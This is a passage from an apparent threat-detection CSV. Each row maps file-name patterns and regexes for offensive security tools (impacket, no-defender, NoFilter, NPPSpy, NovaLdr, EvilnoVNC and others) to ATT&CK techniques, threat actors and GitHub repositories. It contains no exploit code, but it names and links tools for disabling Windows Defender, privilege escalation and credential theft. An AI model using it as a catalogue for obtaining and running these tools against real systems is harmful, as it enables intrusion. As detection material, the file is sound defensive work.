Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","9201" "*/nmapAnswerMachine.exe*",".{0,1000}\/nmapAnswerMachine\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9202" "*/nmapAnswerMachine.py*",".{0,1000}\/nmapAnswerMachine\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9203" "*/nntp-ntlm-info.nse*",".{0,1000}\/nntp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9213" "*/no_defender.exe*",".{0,1000}\/no_defender\.exe.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. 
(through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9214" "*/NoAmci.exe*",".{0,1000}\/NoAmci\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9215" "*/NoArgs.exe*",".{0,1000}\/NoArgs\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","9216" "*/NoArgs.git*",".{0,1000}\/NoArgs\.git.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. 
This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","9217" "*/No-Consolation.git*",".{0,1000}\/No\-Consolation\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","9218" "*/no-defender.git*",".{0,1000}\/no\-defender\.git.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9219" "*/no-defender.sln*",".{0,1000}\/no\-defender\.sln.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. 
(through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9220" "*/no-defender.vcxproj*",".{0,1000}\/no\-defender\.vcxproj.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9221" "*/no-defender-loader.exe*",".{0,1000}\/no\-defender\-loader\.exe.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9222" "*/no-defender-loader/main.cpp*",".{0,1000}\/no\-defender\-loader\/main\.cpp.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9223" "*/NodeRelayConsoleExe_d64.exe*",".{0,1000}\/NodeRelayConsoleExe_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","9224" "*/Nofault.exe*",".{0,1000}\/Nofault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","9225" "*/NoFilter.cpp*",".{0,1000}\/NoFilter\.cpp.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","9226" "*/NoFilter.exe*",".{0,1000}\/NoFilter\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","9227" "*/NoFilter.git*",".{0,1000}\/NoFilter\.git.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","9228" "*/NoFilter.sln*",".{0,1000}\/NoFilter\.sln.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","9229" "*/NoFilter.vcxproj*",".{0,1000}\/NoFilter\.vcxproj.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","9230" "*/nopac.exe",".{0,1000}\/nopac\.exe","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","9231" "*/nopac.py*",".{0,1000}\/nopac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9232" "*/No-PowerShell.cs*",".{0,1000}\/No\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9233" "*/NoPowerShell.exe*",".{0,1000}\/NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - 
T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9234" "*/NoPowerShell.exe*",".{0,1000}\/NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","NoPowerShell","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9235" "*/NoPowerShell.exe*",".{0,1000}\/NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9236" "*/No-PowerShell.exe*",".{0,1000}\/No\-PowerShell\.exe.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9237" 
"*/nopowershell.git*",".{0,1000}\/nopowershell\.git.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","9238" "*/nopowershell/*",".{0,1000}\/nopowershell\/.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","9239" "*/NoPowerShell/*",".{0,1000}\/NoPowerShell\/.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","9240" "*/norouteconfig.sh*",".{0,1000}\/norouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","9241" "*/noseyparker.git*",".{0,1000}\/noseyparker\.git.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","9242" "*/NotQuite0DayFriday/zip/trunk*",".{0,1000}\/NotQuite0DayFriday\/zip\/trunk.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - 
T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","9243" "*/NovaLdr.exe",".{0,1000}\/NovaLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","9244" "*/NovaLdr.git*",".{0,1000}\/NovaLdr\.git.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","9245" "*/NoveLdr.exe",".{0,1000}\/NoveLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","9246" "*/noVNC/index.html*",".{0,1000}\/noVNC\/index\.html.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","9247" "*/noVNC/utils/novnc_proxy*",".{0,1000}\/noVNC\/utils\/novnc_proxy.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","9248" "*/noVNC/vnc_lite.html*",".{0,1000}\/noVNC\/vnc_lite\.html.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","9249" "*/nowsecure/dirtycow*",".{0,1000}\/nowsecure\/dirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z","9250" "*/nping-brute.nse*",".{0,1000}\/nping\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9251" "*/NPPSPY.dll*",".{0,1000}\/NPPSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9252" "*/NPPSpy.exe*",".{0,1000}\/NPPSpy\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9253" "*/nps/releases/download/*",".{0,1000}\/nps\/releases\/download\/.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","1","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","9254" "*/nps_payload.git*",".{0,1000}\/nps_payload\.git.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation 
tool","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","9","5","442","123","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z","9255" "*/nrpc.py*",".{0,1000}nrpc\.py.{0,1000}","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","Dispossessor","Exploitation tool","https://github.com/michaelpoznecki/zerologon","1","0","N/A","N/A","N/A","1","10","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z","9256" "*/nrpe-enum.nse*",".{0,1000}\/nrpe\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9257" "*/nsa-rules.git*",".{0,1000}\/nsa\-rules\.git.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","N/A","10","6","547","125","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z","9258" "*/nsocks.dll*",".{0,1000}\/nsocks\.dll.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","1","N/A","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","9261" "*/NSocks.exe*",".{0,1000}\/NSocks\.exe.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090.002 - T1090 - T1071.001 - T1572","TA0011 - TA0005","N/A","Scattered 
Spider* - Black Basta","C2","https://github.com/bbepis/NSocks","1","1","N/A","N/A","9","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","9262" "*/NSocks.git*",".{0,1000}\/NSocks\.git.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","1","N/A","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","9263" "*/NSudo.bat*",".{0,1000}\/NSudo\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","9266" "*/NSudo.exe*",".{0,1000}\/NSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","9267" "*/NSudo.exe*",".{0,1000}\/NSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
